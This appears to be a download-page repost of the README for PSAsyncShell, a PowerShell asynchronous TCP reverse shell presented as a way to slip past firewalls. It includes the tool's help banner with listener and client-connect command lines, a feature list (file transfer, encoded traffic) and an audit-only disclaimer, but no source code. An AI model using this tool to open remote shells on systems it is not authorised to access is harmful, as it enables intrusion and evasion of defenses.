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HistorySep 25, 2022 - 11:30 a.m.

PSAsyncShell - PowerShell Asynchronous TCP Reverse Shell


PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell.

Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing to bypass some firewalls and some countermeasures against this kind of remote connections.

Additionally, this tool features command history, screen wiping, file uploading and downloading, information splitting through chunks and reverse Base64 URL encoded traffic.


  • PowerShell 4.0 or greater


It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone  


.\PSAsyncShell.ps1 -h  
  ____  ____    _                         ____  _          _ _  
 |  _ \/ ___|  / \   ___ _   _ _ __   ___/ ___|| |__   ___| | |  
 | |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |  
 |  __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | |  __/ | |  
 |_|   |____/_/   \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|  
  ---------------------- by @JoelGMSec -----------------------  
 Info:  This tool helps you to get a remote shell  
        over asynchronous TCP to bypass firewalls  
 Usage: .\PSAsyncShell.ps1 -s -p listen_port  
          Listen for a new connection from the client  
        .\PSAsyncShell.ps1 -c server_ip server_port  
          Connect the [client](<> "client" ) to a PSAsyncShell server  
 Warning: All info betwen parts will be sent unencrypted  
          Download & Upload functions don't use MultiPart  

The detailed guide of use can be found at the following link:



This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel GΓ‘mez Molina // @JoelGMSec


This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog

Download PSAsyncShell